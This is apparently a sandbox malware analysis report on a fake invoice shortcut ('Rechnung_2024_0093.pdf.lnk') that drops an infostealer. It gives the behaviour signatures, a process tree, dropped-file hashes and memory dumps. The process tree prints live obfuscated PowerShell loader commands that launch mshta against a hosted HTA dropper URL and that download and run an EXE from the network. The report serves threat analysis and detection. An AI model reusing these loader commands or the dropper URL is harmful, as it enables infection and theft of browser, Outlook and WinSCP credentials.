Analysis

  • max time kernel
    131s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/11/2024, 20:00

General

  • Target

    Rechnung_2024_0093.pdf.lnk

  • Size

    3KB

  • MD5

    001c1231f099ae2188df58798c2c32cf

  • SHA1

    6e8394a04aa35551437d91910c787bf2165c175b

  • SHA256

    0d6049a23bc24a385997c0514ffc22a9c0c9ba681d1cac2f6cb5013bafeefe4f

  • SHA512

    b46b0ed51706e68a7b2e1d3609caaa2bc45676cb876c9ca72c51d9e34d2e5821dba256378950b3dc678d44c0cbfe14a6f599c66fb6843a34c76f7e258959e2c9

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev/123.hta

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 25 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Start PowerShell.

  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • outlook_office_path 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Rechnung_2024_0093.pdf.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:960
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $a='48aAs.69edS3b/:15u2vtmrpL0-7h'; &(-join($a[(-648+652),(169-167),(990-966)])) ^[ (-join($a[(-648+652),(169-167),(990-966)])); ^[ /# (-join($a[(-476+497),(-648+652),(-158+186),(-824+844),(169-167)])); foreach($z in @((-105+133),(-426+446),(575-555),(173-150),(-217+221),(-509+523),(524-511),(711-698),(210-187),(-471+488),(-724+736),(-668+694),(-606+622),(-351+363),(906-899),(-719+737),(899-881),(166-155),(387-375),(-188+203),(-604+616),(783-776),(-378+386),(775-748),(660-660),(995-993),(803-776),(-863+888),(-920+932),(333-325),(994-976),(559-541),(700-698),(835-810),(-958+959),(425-410),(-411+417),(686-684),(-963+964),(569-557),(934-907),(861-853),(-724+726),(950-941),(494-489),(-470+492),(-789+807),(805-800),(-232+241),(-603+611),(1008-989),(-242+255),(-653+668),(-705+723),(580-569),(-536+541),(986-958),(736-716),(-368+370))){$m+=$a[$z]}; /# $m;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4560
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" https://pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev/123.hta
        3⤵
        • Blocklisted process makes network request
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1660
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hQzEzFacg($guorUJ, $OIoEigYq){[IO.File]::WriteAllBytes($guorUJ, $OIoEigYq)};function uuuOHRemK($guorUJ){if($guorUJ.EndsWith((ijnaJnaV @(5036,5090,5098,5098))) -eq $True){Start-Process (ijnaJnaV @(5104,5107,5100,5090,5098,5098,5041,5040,5036,5091,5110,5091)) $guorUJ}else{Start-Process $guorUJ}};function xlptFHdqR($FSYzd){$EBqZdo = New-Object (ijnaJnaV @(5068,5091,5106,5036,5077,5091,5088,5057,5098,5095,5091,5100,5106));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OIoEigYq = $EBqZdo.DownloadData($FSYzd);return $OIoEigYq};function ijnaJnaV($UxikGUX){$MKUYRJP=4990;$VRwScE=$Null;foreach($NymBWJi in $UxikGUX){$VRwScE+=[char]($NymBWJi-$MKUYRJP)};return $VRwScE};function TQiKbyGz(){$vXhNEzkB = $env:APPDATA + '\';$WRrNymqB = xlptFHdqR (ijnaJnaV @(5094,5106,5106,5102,5105,5048,5037,5037,5102,5107,5088,5035,5043,5088,5047,5040,5040,5041,5088,5039,5088,5047,5091,5045,5042,5087,5045,5038,5088,5091,5040,5040,5087,5038,5046,5039,5044,5087,5046,5088,5045,5091,5087,5090,5036,5104,5040,5036,5090,5091,5108,5037,5059,5078,5056,5072,5072,5076,5071,5074,5036,5091,5110,5091));$AvKehPB = $vXhNEzkB + 'EXBRRVQT.exe';hQzEzFacg $AvKehPB $WRrNymqB;uuuOHRemK $AvKehPB;;;;}TQiKbyGz;
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1152
          • C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe
            "C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4296
            • C:\Windows\Temp\{3553DFEA-0E14-48EA-985C-867D5C26F859}\.cr\EXBRRVQT.exe
              "C:\Windows\Temp\{3553DFEA-0E14-48EA-985C-867D5C26F859}\.cr\EXBRRVQT.exe" -burn.clean.room="C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe" -burn.filehandle.attached=544 -burn.filehandle.self=528
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4600
              • C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\ActiveISO.exe
                "C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\ActiveISO.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:4580
                • C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
                  C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of WriteProcessMemory
                  PID:1344
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\SysWOW64\cmd.exe
                    9⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of WriteProcessMemory
                    PID:632
                    • C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
                      C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
                      10⤵
                      • Loads dropped DLL
                      • Accesses Microsoft Outlook profiles
                      • Suspicious behavior: EnumeratesProcesses
                      • outlook_office_path
                      PID:3720
  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
    1⤵
      PID:4492

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      75b4b2eecda41cec059c973abb1114c0

      SHA1

      11dadf4817ead21b0340ce529ee9bbd7f0422668

      SHA256

      5540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134

      SHA512

      87feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626

    • C:\Users\Admin\AppData\Local\Temp\940862fc

      Filesize

      5.4MB

      MD5

      c3cec1b04ec373823d4adb1029a0bd1e

      SHA1

      cd34cffcfb3bff8253661b02927e09436cf7543c

      SHA256

      54335d5d5fb92c75c5bedd2ac9818c66e4dffd42d5cff31f536be56c155ce5f2

      SHA512

      30def85163cd72a76d74818bbf151a2ca540d85349ccc474521405cd449bbe402f722a1cc97d4d3f497bac38e59d754ef4fba655d1b010edfde02736a29f2936

    • C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe

      Filesize

      2.3MB

      MD5

      967f4470627f823f4d7981e511c9824f

      SHA1

      416501b096df80ddc49f4144c3832cf2cadb9cb2

      SHA256

      b22bf1210b5fd173a210ebfa9092390aa0513c41e1914cbe161eb547f049ef91

      SHA512

      8883ead428c9d4b415046de9f8398aa1f65ae81fe7945a840c822620e18f6f9930cce2e10acff3b5da8b9c817ade3dabc1de576cbd255087267f77341900a41c

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5wlcbxwn.d5f.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe

      Filesize

      13.8MB

      MD5

      b6ab13b3b9903bf84327737ba227bab3

      SHA1

      65dff8665b502ba33f3effb8430263e4f906c1c0

      SHA256

      baa56e574d8deed445d0e58487add9d429d60bbb1b39943c581bcf50e9bd91d6

      SHA512

      6f6ec1217e14f96a52cfa314327a09bfe74199fa0a85d94f0bd5381a0af7c96ac26ba8b5506663f76473c0714609c80d58cb86bde73888cfd6ea15060793f5c7

    • C:\Windows\Temp\{3553DFEA-0E14-48EA-985C-867D5C26F859}\.cr\EXBRRVQT.exe

      Filesize

      13.7MB

      MD5

      eb26dfa5e4e3170d90b5629df0715aa9

      SHA1

      bbc10367aa29aa36a6e53c63b60a6936bc6f1720

      SHA256

      70721a20760818839c7ef0ce2d684666bd07bbb79b87415944c6efbce58f7906

      SHA512

      11e2683c8f47c62548050f863386e62908c5dd7e456ca13c22644ecb984533d3abdd72d1fd5a3ac53c1b2734e5999554d383f3f5c615d4c94c4c169664787bf9

    • C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\ActiveISO.exe

      Filesize

      1.2MB

      MD5

      b84dfabe933d1160f624693d94779ce5

      SHA1

      ac0133c09708fe4a3c626e3ba4cdf44d3a0e065f

      SHA256

      588cb61b36a001384a2833bd5df8d7982ca79d6ae17a3d83a94e01b1e79684bd

      SHA512

      eeaeef8d6b5fa02dedf9818babaa4b5ffdb87300521883aa290289dcc720b3d543279085ed3fc649b74654143e678502e56eb3f92c4baf53c075977de33c1b0e

    • C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\Helicoid.dll

      Filesize

      179KB

      MD5

      a9c5977784daf8cebe8408a8b6db3fbe

      SHA1

      8ae8d67007cdca9acf96681ffa6200e5847972de

      SHA256

      63f5a34563b62de3dffa57401d7225f4687933cef250b78b995eee813c862fad

      SHA512

      886fbea2c959ce4245185d1dcec3efcfbb50a71840c964d4fd8e0a46f7fbf8afbf7445bc2d892789f25124b862912fb0c3556c5004a7e6ddb4ee13b87cf58a65

    • C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\Qt5Core.dll

      Filesize

      5.8MB

      MD5

      8c735052a2d4e9b01b0e028f0c20f67c

      SHA1

      b72bde11de3310a495dd16520362f4adbf21717a

      SHA256

      d751ab0357f71586b1793ce4166295aba085334647d6e3ffcd49287a801273e7

      SHA512

      0bbd920e1b48361c7f3e1540ddb12fa6c9146bfe36e13eba2b2e6ca8bf3ad961d88121c6f70eca6d9ea413900455e696f7233c5bb54415ca7d2c9c1c0d4c1fb3

    • C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\Qt5Gui.dll

      Filesize

      6.2MB

      MD5

      34893cb3d9a2250f0edecd68aedb72c7

      SHA1

      37161412df2c1313a54749fe6f33e4dbf41d128a

      SHA256

      ca8334b2e63bc01f0749afeb9e87943c29882131efe58608ea25732961b2df34

      SHA512

      484e32832d69ec1799bd1bcc694418801c443c732ed59ecd76b3f67abf0b1c97d64ae123728dfa99013df846ba45be310502ef6f8da42155da2e89f2a1e8cb2c

    • C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\Qt5Network.dll

      Filesize

      1.3MB

      MD5

      fe5ed4c5da03077f98c3efa91ecefd81

      SHA1

      e23e839ec0602662788f761ebe7dd4b39c018a7f

      SHA256

      d992aaeb21cb567113126c2912cf75e892c8e3ead5d50147a11abe704b9e2e2b

      SHA512

      22514732a0edf8fc2b8770139599132429080b86d2844143d21bb834cbddaaa077d763969960e39e2050a69493c1aae191600e5df6107bde90fae589a054f071

    • C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\Qt5PrintSupport.dll

      Filesize

      316KB

      MD5

      d0634933db2745397a603d5976bee8e7

      SHA1

      ddec98433bcfec1d9e38557d803bc73e1ff883b6

      SHA256

      7d91d3d341dbba568e2d19382e9d58a42a0d78064c3ad7adfe3c7bb14742c2b1

      SHA512

      9271370cd22115f68bd62572640525e086a05d75f5bc768f06e20b90b48a182f29a658a07099c7bc1e99bf0ffcf1229709524e2af6745d6fed7b41c1addd09f1

    • C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\Qt5Widgets.dll

      Filesize

      5.3MB

      MD5

      c502bb8a4a7dc3724ab09292cd3c70d6

      SHA1

      ff44fddeec2d335ec0eaa861714b561f899675fd

      SHA256

      4266918226c680789d49cf2407a7fec012b0ed872adafb84c7719e645f9b2e6d

      SHA512

      73bef89503ce032fba278876b7dab9eac275632df7a72c77093d433c932272da997e8fbeb431a09d84baac7b2ab2e55222ff687893311949a5603e738bfa6617

    • C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\StarBurn.dll

      Filesize

      1.4MB

      MD5

      41e19ba2364f2c834b2487e1d02bb99a

      SHA1

      6c61d603dddfe384a93ad33775b70681d0a396d9

      SHA256

      c040a25377028b0c28db81a012de786c803a0e9d6f87ce460335a621d31f5340

      SHA512

      6ebf4a9e80f16c6a03ff357d2da9a34a4227bfd65eb66d1d335349a77ba066d069ba0d47d46229b3c77b59052c42d388678662f970b418d8cc3cfb1223427d8c

    • C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\dcfa

      Filesize

      4.3MB

      MD5

      456596683dad1217c76d8c0f47b5cfbc

      SHA1

      001ae3f937aa75ad2175289c6e8f09561a1cbb35

      SHA256

      a7e578d0f7a5d522e4b4e62864f77cbb1830dc7e7026c9ee0b5f6fa7156c727f

      SHA512

      537420007a4985f2deb4b2a48af1ba61cf8cc112359ec1cdbd02dfb8e958ab5ab4ec302cd0698a14d4560afe6c23627d1d4d080eac9daa7cb5edc7259cb73591

    • C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\msvcp140.dll

      Filesize

      557KB

      MD5

      7db24201efea565d930b7ec3306f4308

      SHA1

      880c8034b1655597d0eebe056719a6f79b60e03c

      SHA256

      72fe4598f0b75d31ce2dc621e8ef161338c6450bb017cd06895745690603729e

      SHA512

      bac5729a3eb53e9bc7b680671d028cabef5ea102dfaa48a7c453b67f8ecb358db9f8fb16b3b1d9ea5a2dff34f459f6ac87f3a563c736d81d31048766198ff11e

    • C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\vcruntime140.dll

      Filesize

      96KB

      MD5

      f12681a472b9dd04a812e16096514974

      SHA1

      6fd102eb3e0b0e6eef08118d71f28702d1a9067c

      SHA256

      d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

      SHA512

      7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

    • C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\vcruntime140_1.dll

      Filesize

      37KB

      MD5

      75e78e4bf561031d39f86143753400ff

      SHA1

      324c2a99e39f8992459495182677e91656a05206

      SHA256

      1758085a61527b427c4380f0c976d29a8bee889f2ac480c356a3f166433bf70e

      SHA512

      ce4daf46bce44a89d21308c63e2de8b757a23be2630360209c4a25eb13f1f66a04fbb0a124761a33bbf34496f2f2a02b8df159b4b62f1b6241e1dbfb0e5d9756

    • C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\vechpt

      Filesize

      15KB

      MD5

      dd899ca13e5bef55bcea07e167da891b

      SHA1

      e883f0240f127520486f063b033fb34fa2dfe5c1

      SHA256

      a818d6fa8caddaa608345ea40b75073a7c98637161794918566e2ddeeede47e7

      SHA512

      e38437899fcc433ef89a04c6a68684ea5110181af48a4699836939cf167d0c1fe7932432518445e90acbcbc151ee324d77de064147d97fdedf6ecabaac788c06

    • memory/632-141-0x0000000074B80000-0x0000000074CFB000-memory.dmp

      Filesize

      1.5MB

    • memory/632-138-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

      Filesize

      2.0MB

    • memory/1344-131-0x00007FFE71240000-0x00007FFE7178E000-memory.dmp

      Filesize

      5.3MB

    • memory/1344-135-0x00007FFE70400000-0x00007FFE70572000-memory.dmp

      Filesize

      1.4MB

    • memory/1344-134-0x00007FFE70400000-0x00007FFE70572000-memory.dmp

      Filesize

      1.4MB

    • memory/3720-148-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp

      Filesize

      2.9MB

    • memory/3720-149-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp

      Filesize

      2.9MB

    • memory/3720-162-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp

      Filesize

      2.9MB

    • memory/3720-158-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp

      Filesize

      2.9MB

    • memory/3720-157-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp

      Filesize

      2.9MB

    • memory/3720-156-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp

      Filesize

      2.9MB

    • memory/3720-152-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp

      Filesize

      2.9MB

    • memory/4560-2-0x00007FFE71FB3000-0x00007FFE71FB5000-memory.dmp

      Filesize

      8KB

    • memory/4560-17-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp

      Filesize

      10.8MB

    • memory/4560-12-0x0000015C6E8F0000-0x0000015C6E912000-memory.dmp

      Filesize

      136KB

    • memory/4560-14-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp

      Filesize

      10.8MB

    • memory/4560-13-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp

      Filesize

      10.8MB

    • memory/4580-93-0x00007FFE70400000-0x00007FFE70572000-memory.dmp

      Filesize

      1.4MB

    • memory/4580-90-0x00007FFE70580000-0x00007FFE70ACE000-memory.dmp

      Filesize

      5.3MB